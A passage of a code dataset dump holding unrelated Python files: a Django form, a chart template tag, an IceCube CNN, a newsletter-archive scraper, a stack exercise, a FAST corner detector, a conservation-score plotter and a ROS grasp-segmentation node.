compression_builder_init_spy.call_args[0][1][\"hw_config_type\"] == HWConfigType.from_str(target_device)\n","sub_path":"tests/test_algo_common.py","file_name":"test_algo_common.py","file_ext":"py","file_size_in_byte":18709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"243743902","text":"from .models import Paciente\nfrom django import forms\nfrom django.forms import ModelForm\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\n\nclass PacienteForm(ModelForm, forms.Form):\n class Meta:\n model = Paciente\n fields = '__all__'\n widgets = {\n 'dataNascimento': DateInput(),\n 'dataInternamento': DateInput(),\n 'dataAlta': DateInput()\n }\n # cartaoSUS = forms.CharField(widget=forms.TextInput(\n # attrs={\n # 'class': 'MyClass',\n # 'placeholder': 'Cartão do SUS'\n # }\n # ))\n\n\n\n# class PacienteForm(forms.Form):\n# cartaoSUS = forms.CharField(widget=forms.TextInput(\n# attrs={\n# 'class': 'MyClass',\n# 
'placeholder': 'Cartão do SUS'\n# }\n# ))\n \n\n \n\n\n","sub_path":"Pacientes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"181185057","text":"from django.template import VariableNode, TextNode\nfrom GChartWrapper import GChart\n\nfrom native_tags.decorators import block\n\n\nCMDS = ('title','axes.type','axes.label','type','encoding','fill','color','scale','legend')\n\ndef parse_cmd(value):\n value = value.lstrip()\n for cmd in CMDS:\n if value.startswith(cmd):\n return cmd,value[len(cmd):].strip()\n return None, None\n\ndef gchart(context, nodelist, type, dataset, **kwargs):\n G = GChart(type, dataset, encoding=kwargs.pop('encoding','text'))\n for node in nodelist:\n if isinstance(node, TextNode):\n for part in node.render(context).splitlines():\n cmd,value = parse_cmd(part)\n if cmd is None: continue\n if cmd.startswith('axes'):\n cmd = getattr(G.axes, cmd[5:])\n else:\n cmd = getattr(G, cmd)\n cmd(*value.split())\n if 'instance' in kwargs:\n return G\n return G.img(**kwargs)\ngchart = block(gchart)\n","sub_path":"native_tags/contrib/gchart.py","file_name":"gchart.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504960467","text":"#!/usr/bin/env python\n\n# docker run -v /home/olivas/icecube_deep_learning:/opt/icecube_deep_learning -u $(id -u):$(id -g) -it tensorflow/tensorflow /opt/icecube_deep_learning/super_simple_cnn.py\n\nimport os\nimport argparse\nimport logging\nimport pickle\nimport random\nimport numpy as np\nimport tensorflow as tf\n\nparser = argparse.ArgumentParser(description='Hello IceCube')\nparser.add_argument('--data_path',\n default='/opt/icecube_deep_learning/data',\n help='Path to training and test data.')\nparser.add_argument('--epochs',\n dest='epochs',\n default=10,\n type=int,\n help='Number of units in the hidden layer.')\nparser.add_argument('--n-hidden-units',\n dest='n_hidden_units',\n default=512,\n type=int,\n help='Number of units in the hidden layer.')\nparser.add_argument('--activation',\n dest='activation',\n default='relu',\n help='Name of tf.keras.activation function.')\nparser.add_argument('--optimizer',\n dest='optimizer',\n default='sgd',\n help='Name of tf.keras.optimizer function.')\nparser.add_argument('--loss',\n dest='loss',\n default='categorical_crossentropy',\n help='Name of tf.keras.loss function.')\nparser.add_argument('--metrics',\n dest='metrics',\n default='accuracy',\n help='Name of tf.keras.metrics function.')\nargs = parser.parse_args()\n\nactivation_options = ['elu', 'hard_sigmoid', 'linear', 'relu', 'selu',\n 'sigmoid', 'softmax', 'softplus', 'softsign', 'tanh']\n\noptimizer_options = ['adadelta', 'adagrad', 'adam', 'adamax', 'nadam', 'rmsprop', 'sgd']\n\nloss_options = ['binary_crossentropy', 'categorical_hinge', 'cosine', 'cosine_proximity',\n 'hinge', 'kullback_leibler_divergence', 'logcosh', 'mae', 'mape',\n 'mean_absolute_error', 'mean_absolute_percentage_error', 'categorical_crossentropy',\n 'mean_squared_logarithmic_error', 'mse', 'poisson', 'sparse_categorical_crossentropy',\n 'squared_hinge'] \n\nmetrics_options = ['accuracy', 'auc', 'average_precision_at_k', 'false_negatives',\n 'false_negatives_at_thresholds', 'false_positives', 'false_positives_at_thresholds',\n 'mean', 'mean_absolute_error', 'mean_cosine_distance', 'mean_iou', 'mean_per_class_accuracy',\n 'mean_relative_error', 
'mean_squared_error', 'mean_tensor', 'percentage_below',\n 'precision', 'precision_at_k', 'precision_at_thresholds', 'precision_at_top_k',\n 'recall', 'recall_at_k', 'recall_at_thresholds', 'recall_at_top_k', 'root_mean_squared_error',\n 'sensitivity_at_specificity', 'sparse_average_precision_at_k', 'sparse_precision_at_k',\n 'specificity_at_sensitivity', 'true_negatives', 'true_negatives_at_thresholds',\n 'true_positives', 'true_positives_at_thresholds']\n\nassert(args.activation in activation_options)\nassert(args.optimizer in optimizer_options)\nassert(args.loss in loss_options)\n\nvalid_metrics = list()\nfor m in args.metrics.split(','):\n if m in metrics_options:\n valid_metrics.append(m)\n else: \n logging.warn('%s is not a valid metric. Ignoring.' % m)\n\ntracks = pickle.load(open(os.path.join(args.data_path,'pev_starting_tracks.pkl')))\ncascades = pickle.load(open(os.path.join(args.data_path,'pev_cascades.pkl')))\n\nlabeled_data = [(0,h) for h in cascades] + [(1,h) for h in tracks]\nrandom.shuffle(labeled_data)\n\nn_output_units = 2\n\nfrom tensorflow.keras.layers import Input, Dense, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.utils import to_categorical\n\ninput_layer = Input(shape=(28, 28, 1))\nconvolution_stage = Conv2D(32,\n (2, 2), \n input_shape=(28, 28, 1),\n activation=args.activation)(input_layer)\npooling_stage = MaxPooling2D(pool_size=(2,2))(convolution_stage) \nflatten_stage = Flatten()(pooling_stage)\noutput_layer = Dense(n_output_units, activation='softmax')(flatten_stage)\n\nmodel = Model(inputs=input_layer, outputs=output_layer)\n\nmodel.compile(optimizer=args.optimizer,\n loss=args.loss,\n metrics=valid_metrics)\n\nx_train = np.array([h for l,h in labeled_data[:200]])\nx_train = x_train.reshape(200, 28, 28, 1)\n\ny_train = np.array([l for l,h in labeled_data[:200]])\ny_train_binary = to_categorical(y_train)\nassert(len(x_train) == len(y_train))\nmodel.fit(x_train, y_train_binary, epochs=args.epochs)\n\nx_test = np.array([h for l,h in labeled_data[200:]])\nprint(x_test.shape)\nx_test = x_test.reshape(200, 28, 28, 1)\ny_test = np.array([l for l,h in labeled_data[200:]])\ny_test_binary = to_categorical(y_test)\nmodel.evaluate(x_test, y_test_binary)\n\nmodel.summary()\n","sub_path":"super_simple_cnn.py","file_name":"super_simple_cnn.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"90844064","text":"#!/usr/bin/env python\r\n\r\n# Copyright (C) Anirudha Bose, 2013,2014\r\n# Originally developed for IIIT Bhubaneswar ACM Student Chapter\r\n\r\n# This library is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU Lesser General Public License as published\r\n# by the Free Software Foundation; either version 2.1 of the License, or\r\n# (at your option) any later version.\r\n\r\n# This library is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See\r\n# the GNU Lesser General Public License for more details.\r\n\r\n\r\nimport webapp2\r\nfrom google.appengine.api import urlfetch\r\nimport jinja2\r\nimport os\r\n\r\n#Initializing Jinja2 --> ==========================================================================#\r\njinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(__file__))) #\r\n#==================================================================================================#\r\n\r\ntarget = \"\"\r\ncss = '''\r\n '''\r\n\r\nclass Newsletters_TechNews_Monthly(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://technews.acm.org/archives.cfm\").content\r\n archive_begin = html.find(\"
\")+6\r\n archive_end = html.find(\"
\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n

Select a month:

\r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"archives.cfm?d=\",\"daily/\")\r\n self.response.out.write(html)\r\n \r\nclass Newsletters_TechNews_Daily(webapp2.RequestHandler):\r\n def get(self,arg):\r\n self.response.headers['Content-Type'] = 'text/html'\r\n year = int(arg[:4])\r\n if year > 2005:\r\n global target\r\n target = \"archives\"\r\n else:\r\n global target\r\n target = \"articles\"\r\n html = urlfetch.fetch(url=\"http://technews.acm.org/\"+target+\".cfm?d=\"+arg).content\r\n archive_begin = html.find(\"
\")+6\r\n archive_end = html.find(\"\"+css+'''\r\n \r\n

Select a day:

\r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(target+\".cfm?fo=\",\"../article/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_TechNews_Article(webapp2.RequestHandler):\r\n def get(self,arg1,arg2):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://technews.acm.org/\"+target+\".cfm?fo=\"+arg1+\"/\"+arg2).content\r\n nav_bar_start = html.find('
',nav_bar_start)\r\n html = html[:nav_bar_start]+html[nav_bar_end:]\r\n if target == \"archives\":\r\n footer_start = html.find(\"\")\r\n footer_end = html.find('',footer_start)+6\r\n html = html[:footer_start]+html[footer_end:]\r\n else:\r\n footer_start = html.find(\"
\")\r\n footer_end = html.find('',footer_start)+6\r\n html = html[:footer_start]+html[footer_end:]\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Monthly(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives\").content\r\n archive_begin = html.find(\"

Select a month

\")\r\n archive_end = html.find(\"\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"http://www.linuxtoday.com/news/archives/\",\"/newsletters/linuxnews/daily/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Daily(webapp2.RequestHandler):\r\n def get(self,arg):\r\n self.response.headers['Content-Type'] = 'text/html'\r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives/\"+arg).content\r\n archive_begin = html.find(\"

Select a day

\")\r\n archive_end = html.find(\"\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"http://www.linuxtoday.com/news/archives/\",\"../../article/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Article(webapp2.RequestHandler):\r\n def get(self,arg1,arg2):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives/\"+arg1+\"/\"+arg2).content\r\n content_start = html.find('

Linux News')\r\n content_end = html.find('',content_start)+5\r\n html = html[content_start:content_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n''' \r\n self.response.out.write(html)\r\n\r\nclass Newsletters(webapp2.RequestHandler):\r\n def get(self):\r\n html = \"\"+css+'''\r\n \r\n
\r\n

The following newsletters are archived here:

\r\n

ACM Tech News --> Full and updated archives of ACM TechNews from 1999 to present.

\r\n

Linux News --> Updated archives of news related to Linux and Open Source from 1998 to present from many different blogs.\r\n


Note: Fetching of archives is an intensive task. If you encounter any 500 Internal Server Error (or Python Tracebacks), reloading the page should solve the problem. The scripts have been known to fail during outages of ACM servers which host the articles.\r\n

Contribute: GitHub repository has been permanently moved here.

\r\n
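# --- Illustrative aside (not part of the original record) ---
# The handlers above all scrape pages with the same str.find()/slice pattern:
# locate a start marker, locate an end marker after it, and keep only the text
# in between. Below is a minimal, self-contained sketch of that pattern; the
# marker strings are hypothetical, since the original markers were lost when
# the embedded HTML tags were stripped from this record.
def extract_between(html, start_marker, end_marker):
    """Return the substring between two markers, or '' if either is missing."""
    begin = html.find(start_marker)
    if begin == -1:
        return ''
    begin += len(start_marker)          # skip past the start marker itself
    end = html.find(end_marker, begin)  # search only after the start marker
    if end == -1:
        return ''
    return html[begin:end]

assert extract_between('<a>hello</a>', '<a>', '</a>') == 'hello'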
\r\n \r\n'''\r\n        self.response.out.write(html)\r\n        \r\n\r\napp = webapp2.WSGIApplication([('/newsletters/', Newsletters),\r\n                               ('/newsletters/technews/', Newsletters_TechNews_Monthly),\r\n                               ('/newsletters/technews/daily/(.*)', Newsletters_TechNews_Daily),\r\n                               ('/newsletters/technews/article/(.*)/(.*)', Newsletters_TechNews_Article),\r\n                               ('/newsletters/linuxnews/', Newsletters_LinuxNews_Monthly),\r\n                               ('/newsletters/linuxnews/daily/(.*)', Newsletters_LinuxNews_Daily),\r\n                               ('/newsletters/linuxnews/article/(.*)/(.*)', Newsletters_LinuxNews_Article)],debug=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364600743","text":"# * Implementing a stack (Stack) with a list\n# A stack is a Last In First Out (LIFO) data structure: the data that arrives last leaves first.\n\n# - Source code\nstack=[]\nb=0\nwhile b < 10:\n    stack.insert(0,input())\n    b += 1\nc=len(stack)\nwhile True:\n    print(stack[0])\n    stack.pop(0)\n    c-=1\n    if c==0:\n        break\n    \nprint(stack)\n# Create an empty stack list and, inside the while loop, use insert() to put each\n# number at the front so that the list takes on a LIFO shape.\n# The rest has the same structure as the queue version: for Last In First Out, print the number at the front of the list and remove it right away.\n# The printed output shows LIFO order and the list ends up empty.","sub_path":"list.stack.py","file_name":"list.stack.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387275060","text":"import numpy as np\nimport cv2\n\ntry:\n    import cPickle as pickle\nexcept ImportError:\n    import pickle\n\n# Load images\nleft_img = cv2.imread(\"../images/test/8ft_L_masked.jpg\")\nright_img = cv2.imread(\"../images/test/8ft_R_masked.jpg\")\n\n# Un-distort\nwith open('../calib/left.calib','rb') as calibfile:\n    h, w = left_img.shape[:2]\n    ret, mtx, dist, rvecs, tvecs, _, _ = pickle.load(calibfile)\n    newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n    # undistort\n    left_img = cv2.undistort(left_img, mtx, dist, None, newcameramtx)\n    x,y,w,h = roi\n    left_img = left_img[y:y+h, x:x+w]\n\nwith open('../calib/right.calib','rb') as calibfile:\n    h, w = right_img.shape[:2]\n    ret, mtx, dist, rvecs, tvecs, _, _ = pickle.load(calibfile)\n    newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n    # undistort\n    right_img = cv2.undistort(right_img, mtx, dist, None, newcameramtx)\n    x,y,w,h = roi\n    right_img = right_img[y:y+h, x:x+w]\n\n# Downsize\nleft_img = cv2.resize(left_img, (640, 480))\nright_img = cv2.resize(right_img, (640, 480))\n\n# Initiate FAST object with default values\nfast = cv2.FastFeatureDetector()\n\n# Find and draw keypoints and coordinates\nmaxnum = 1\nnum = 0\nleft_kp = fast.detect(left_img, None)\nleft_img_kp = cv2.drawKeypoints(left_img, left_kp, color=(255,0,0))\nfor kp in left_kp:\n    pt = (int(kp.pt[0]), int(kp.pt[1]))\n    cv2.putText(left_img_kp, str(pt), pt, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(255, 0, 0), thickness=1)\n    num += 1\n    if num >= maxnum:\n        break\n\nnum = 0\nright_kp = fast.detect(right_img, None)\nright_img_kp = cv2.drawKeypoints(right_img, right_kp, color=(255, 0, 0))\nfor kp in right_kp:\n    pt = (int(kp.pt[0]), int(kp.pt[1]))\n    cv2.putText(right_img_kp, str(pt), pt, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(255, 0, 0), thickness=1)\n    num += 1\n    if num >= maxnum:\n        break\n\nimg_out = np.concatenate((left_img_kp, right_img_kp), 
axis=1)\ncv2.imshow('image',img_out)\ncv2.imwrite('../images/output/fast_corner.jpg',img_out)\ncv2.waitKey(0)\n\n","sub_path":"src/fast_stereo_pairing.py","file_name":"fast_stereo_pairing.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"268088704","text":"import re\nimport gzip\nfrom wigfixblock import WigfixBlock\nimport matplotlib.pyplot as plt\n\n\ndef plot_cons(wigfix_file):\n    \"\"\"\n    Plot blocks of conservation scores for visual evaluation.\n    :param wigfix_file: path to a gzipped fixed-step wiggle (wigFix) file of conservation scores\n    :return: None\n    \"\"\"\n\n    # chromosome in str representation\n    ch = re.search(\"chr(?:\\d{1,2}|[XYM])\", wigfix_file).group()\n\n    # make one regex for a block of header and data\n    # this should be compatible with any wiggle formatted data\n    # (source: http://genome.ucsc.edu/goldenPath/help/phastCons.html)\n    # NOTE: inner group for scores is NON-CAPTURING with the (?:...) notation, just finds matches for outer group\n    block = re.compile(\"fixedStep chrom=(chr\\d+) start=(\\d+) step=(\\d+)\\n((?:-?\\d\\.\\d{3}\\n)+)\", re.MULTILINE)\n\n    with gzip.open(wigfix_file, \"r\") as f:\n        cons = f.read()\n\n    # the end of the previous block (starts at 0)\n    end = 0\n\n    # use an iterator to return blocks\n    for blk in re.finditer(block, cons):\n\n        # feed the match groups into the WigFixBlock class to create the mask\n        blk = WigfixBlock(blk.groups())\n\n        # get the start and end position for the block\n        start = blk.start\n        end = start + len(blk.scores)\n\n        # make sure that the block obeys the normal rules\n        assert blk.chrom == ch\n        assert blk.step == 1\n\n        plt.plot(range(start, end), blk.scores)\n    plt.show()\n\n\nphastfile = \"/Users/davidmurphy/GoogleDrive/linked_selection/data/data_scrap/chr2.phastCons100way.wigFix.gz\"\nplot_cons(phastfile)\n","sub_path":"GoogleDrive/linked_selection/myprograms/cluster_code/filtering/plot_cons_scores.py","file_name":"plot_cons_scores.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"182096416","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport easydict\nimport matplotlib\nimport numpy as np\nimport os.path as osp\n# import time\nimport yaml\n\nmatplotlib.use('Agg')  # NOQA\n\nimport chainer\nimport cv_bridge\nfrom dynamic_reconfigure.server import Server\nfrom jsk_recognition_msgs.msg import ClassificationResult\nfrom jsk_recognition_msgs.msg import ClusterPointIndices\nfrom jsk_recognition_msgs.msg import Label\nfrom jsk_recognition_msgs.msg import LabelArray\nfrom jsk_recognition_msgs.msg import Rect\nfrom jsk_recognition_msgs.msg import RectArray\nfrom jsk_topic_tools import ConnectionBasedTransport\nimport matplotlib.pyplot as plt\nimport message_filters\nfrom pcl_msgs.msg import PointIndices\nimport rospy\nimport scipy\nfrom sensor_msgs.msg import Image\nfrom sklearn.cluster import KMeans\nfrom std_srvs.srv import Trigger\nfrom std_srvs.srv import TriggerResponse\n\nfrom dualarm_grasping.models import OccludedGraspMaskRCNNResNet101\nfrom dualarm_grasping.visualizations import vis_occluded_grasp_instance_segmentation\n\nfrom dualarm_grasping.cfg \\\n    import DualarmOccludedGraspInstanceSegmentationConfig\nfrom dualarm_grasping.msg import GraspClassificationResult\nfrom dualarm_grasping.srv import GetAnother\nfrom dualarm_grasping.srv import GetAnotherResponse\n\n\nfilepath = 
osp.dirname(osp.realpath(__file__))\n\n\nclass DualarmOccludedGraspInstanceSegmentation(ConnectionBasedTransport):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self.gpu = rospy.get_param('~gpu', -1)\n model_file = rospy.get_param('~model_file')\n\n self.label_names = rospy.get_param('~label_names')\n self.bg_index = rospy.get_param('~bg_index', -1)\n if self.bg_index >= 0:\n bg_label_name = self.label_names[self.bg_index]\n if bg_label_name != '__background__':\n rospy.logerr('bg_label_name is not __background__: {}'\n .format(bg_label_name))\n\n self.sampling = rospy.get_param('~sampling', False)\n self.sampling_weighted = rospy.get_param('~sampling_weighted', False)\n cfgpath = rospy.get_param(\n '~config_yaml', osp.join(filepath, '../yaml/config.yaml'))\n with open(cfgpath, 'r') as f:\n config = easydict.EasyDict(yaml.load(f))\n\n tote_contents = rospy.get_param('~tote_contents', None)\n self.candidates = [self.bg_index]\n if tote_contents is None:\n self.candidates += range(len(self.label_names))\n else:\n self.candidates += [\n self.label_names.index(x) for x in tote_contents]\n self.candidates = sorted(list(set(self.candidates)))\n\n self.giveup_ins_ids = {\n 'single': [],\n 'dual': [],\n }\n\n self.target_grasp = rospy.get_param('~target_grasp', False)\n target_names = rospy.get_param('~target_names', None)\n if self.target_grasp and target_names is None:\n target_names = self.label_names\n self.target_ids = [\n self.label_names.index(x) for x in target_names]\n\n # chainer global config\n chainer.global_config.train = False\n chainer.global_config.enable_backprop = False\n\n # mask rcnn\n if 'rotate_angle' not in config:\n self.rotate_angle = None\n else:\n self.rotate_angle = config.rotate_angle\n self.model = OccludedGraspMaskRCNNResNet101(\n n_fg_class=len(self.label_names),\n anchor_scales=config.anchor_scales,\n min_size=config.min_size,\n max_size=config.max_size,\n rpn_dim=config.rpn_dim,\n rotate_angle=self.rotate_angle)\n chainer.serializers.load_npz(model_file, self.model)\n\n if self.gpu != -1:\n chainer.cuda.get_device_from_id(self.gpu).use()\n self.model.to_gpu()\n\n # input\n self.pub_net_input = self.advertise(\n '~debug/net_input', Image, queue_size=1)\n self.pub_vis_output = self.advertise(\n '~debug/vis_output', Image, queue_size=1)\n # vis\n self.pub_vis_cpi = self.advertise(\n '~output/vis/cluster_indices', ClusterPointIndices, queue_size=1)\n self.pub_vis_labels = self.advertise(\n '~output/vis/labels', LabelArray, queue_size=1)\n self.pub_vis_cls_lbl = self.advertise(\n '~output/vis/cls_label', Image, queue_size=1)\n self.pub_vis_ins_lbl = self.advertise(\n '~output/vis/ins_label', Image, queue_size=1)\n\n # occ\n self.pub_occ_cpi = self.advertise(\n '~output/occ/cluster_indices', ClusterPointIndices, queue_size=1)\n self.pub_occ_labels = self.advertise(\n '~output/occ/labels', LabelArray, queue_size=1)\n self.pub_occ_cls_lbl = self.advertise(\n '~output/occ/cls_label', Image, queue_size=1)\n self.pub_occ_ins_lbl = self.advertise(\n '~output/occ/ins_label', Image, queue_size=1)\n\n # bbox\n self.pub_rects = self.advertise(\n \"~output/rects\", RectArray, queue_size=1)\n\n # class\n self.pub_class = self.advertise(\n \"~output/class\", ClassificationResult,\n queue_size=1)\n\n # single\n self.pub_sg_cpi = self.advertise(\n '~output/single/cluster_indices',\n ClusterPointIndices, queue_size=1)\n self.pub_sg_labels = self.advertise(\n '~output/single/labels', LabelArray, queue_size=1)\n self.pub_sg_cls_lbl = self.advertise(\n 
'~output/single/cls_label', Image, queue_size=1)\n self.pub_sg_ins_lbl = self.advertise(\n '~output/single/ins_label', Image, queue_size=1)\n\n # dual\n self.pub_dg_cpi = self.advertise(\n '~output/dual/cluster_indices',\n ClusterPointIndices, queue_size=1)\n self.pub_dg_labels = self.advertise(\n '~output/dual/labels', LabelArray, queue_size=1)\n self.pub_dg_cls_lbl = self.advertise(\n '~output/dual/cls_label', Image, queue_size=1)\n self.pub_dg_ins_lbl = self.advertise(\n '~output/dual/ins_label', Image, queue_size=1)\n\n # output\n self.pub_grasp_mask = self.advertise(\n '~output/grasp_mask', Image, queue_size=1)\n self.pub_grasp_class = self.advertise(\n '~output/grasp_class', GraspClassificationResult, queue_size=1)\n\n self.get_another_service = rospy.Service(\n '~get_another', GetAnother, self._get_another)\n self.reset_service = rospy.Service(\n '~reset', Trigger, self._reset)\n self.dyn_srv = Server(\n DualarmOccludedGraspInstanceSegmentationConfig,\n self._dyn_callback)\n\n def subscribe(self):\n # larger buff_size is necessary for taking time callback\n # http://stackoverflow.com/questions/26415699/ros-subscriber-not-up-to-date/29160379#29160379 # NOQA\n queue_size = rospy.get_param('~queue_size', 10)\n self.use_mask = rospy.get_param('~use_mask', True)\n if self.use_mask:\n sub = message_filters.Subscriber(\n '~input', Image, queue_size=1, buff_size=2**24)\n sub_mask = message_filters.Subscriber(\n '~input/mask', Image, queue_size=1, buff_size=2**24)\n self.subs = [sub, sub_mask]\n if rospy.get_param('~approximate_sync', False):\n slop = rospy.get_param('~slop', 0.1)\n sync = message_filters.ApproximateTimeSynchronizer(\n self.subs, queue_size=queue_size, slop=slop)\n else:\n sync = message_filters.TimeSynchronizer(\n self.subs, queue_size=queue_size)\n sync.registerCallback(self._recognize)\n else:\n sub = rospy.Subscriber(\n '~input', Image, callback=self._recognize,\n queue_size=queue_size, buff_size=2**24)\n\n def unsubscribe(self):\n for sub in self.subs:\n sub.unregister()\n\n def _recognize(self, img_msg, mask_msg=None):\n self.model.score_thresh = self.score_thresh\n self.model.nms_thresh = self.nms_thresh\n\n bridge = cv_bridge.CvBridge()\n rgb = bridge.imgmsg_to_cv2(img_msg, desired_encoding='rgb8')\n if self.use_mask:\n if mask_msg is not None:\n mask = bridge.imgmsg_to_cv2(mask_msg)\n # rgb[mask < 128] = self.model.mean.flatten()\n # H, W, C -> C, H, W\n img = rgb.transpose((2, 0, 1))\n results = self.model.predict([img], return_probs=True)\n ins_labels, ins_probs, labels, bboxes, scores = results[:5]\n sg_labels, sg_probs, dg_labels, dg_probs = results[5:]\n try:\n ins_label, ins_prob, label, bbox, score = \\\n ins_labels[0], ins_probs[0], labels[0], bboxes[0], scores[0]\n sg_label, sg_prob, dg_label, dg_prob = \\\n sg_labels[0], sg_probs[0], dg_labels[0], dg_probs[0]\n except IndexError:\n rospy.logerr('no predicts returned')\n return\n\n # matplot\n fig, axes = plt.subplots(\n 1, 5, sharey=True, figsize=(100, 20), dpi=120)\n vis_occluded_grasp_instance_segmentation(\n img, ins_label, label, bbox, score,\n sg_label, dg_label, self.label_names,\n rotate_angle=self.rotate_angle, axes=axes,\n linewidth=5.0, fontsize=30)\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n vis_output_img = np.fromstring(\n fig.canvas.tostring_rgb(), dtype=np.uint8)\n fig.clf()\n vis_output_img.shape = (h, w, 3)\n plt.close()\n vis_output_msg = bridge.cv2_to_imgmsg(\n vis_output_img, encoding='rgb8')\n vis_output_msg.header = img_msg.header\n\n # msg\n # input\n net_input_msg = 
bridge.cv2_to_imgmsg(\n rgb.astype(np.uint8), encoding='rgb8')\n net_input_msg.header = img_msg.header\n\n # vis lbls\n vis_cpi_msg = ClusterPointIndices(header=img_msg.header)\n vis_labels_msg = LabelArray(header=img_msg.header)\n vis_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n vis_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n vis_ins_n_pixel = []\n\n # occ lbls\n occ_cpi_msg = ClusterPointIndices(header=img_msg.header)\n occ_labels_msg = LabelArray(header=img_msg.header)\n occ_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n occ_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n occ_ins_n_pixel = []\n\n if len(label) == 0 or len(ins_label) == 0:\n return\n\n for ins_id, (cls_id, ins_lbl) in enumerate(zip(label, ins_label)):\n # vis region\n if self.use_mask:\n vis_msk = np.logical_and(ins_lbl == 1, mask > 128)\n else:\n vis_msk = ins_lbl == 1\n vis_ins_n_pixel.append(vis_msk.sum())\n\n # occ region\n if self.use_mask:\n occ_msk = np.logical_and(ins_lbl == 2, mask > 128)\n else:\n occ_msk = ins_lbl == 2\n occ_ins_n_pixel.append(occ_msk.sum())\n\n if cls_id not in self.candidates:\n continue\n\n # vis region\n class_name = self.label_names[cls_id]\n vis_indices = np.where(vis_msk.flatten())[0]\n vis_indices_msg = PointIndices(\n header=img_msg.header, indices=vis_indices)\n vis_cpi_msg.cluster_indices.append(vis_indices_msg)\n vis_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n vis_cls_lbl[vis_msk] = cls_id\n vis_ins_lbl[vis_msk] = ins_id\n\n # occ region\n occ_indices = np.where(occ_msk.flatten())[0]\n occ_indices_msg = PointIndices(\n header=img_msg.header, indices=occ_indices)\n occ_cpi_msg.cluster_indices.append(occ_indices_msg)\n occ_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n occ_cls_lbl[occ_msk] = cls_id\n occ_ins_lbl[occ_msk] = ins_id\n\n vis_cls_lbl_msg = bridge.cv2_to_imgmsg(vis_cls_lbl)\n vis_cls_lbl_msg.header = img_msg.header\n vis_ins_lbl_msg = bridge.cv2_to_imgmsg(vis_ins_lbl)\n vis_ins_lbl_msg.header = img_msg.header\n vis_ins_n_pixel = np.array(vis_ins_n_pixel, dtype=np.int32)\n\n occ_cls_lbl_msg = bridge.cv2_to_imgmsg(occ_cls_lbl)\n occ_cls_lbl_msg.header = img_msg.header\n occ_ins_lbl_msg = bridge.cv2_to_imgmsg(occ_ins_lbl)\n occ_ins_lbl_msg.header = img_msg.header\n occ_ins_n_pixel = np.array(occ_ins_n_pixel, dtype=np.int32)\n\n # bbox\n rects_msg = RectArray(header=img_msg.header)\n for bb in bbox:\n rect = Rect(x=bb[1], y=bb[0],\n width=bb[3] - bb[1],\n height=bb[2] - bb[0])\n rects_msg.rects.append(rect)\n\n # classification\n cls_msg = ClassificationResult(\n header=img_msg.header,\n classifier='OccludedGraspMaskRCNNResNet101',\n target_names=self.label_names,\n labels=label,\n label_names=[self.label_names[lbl] 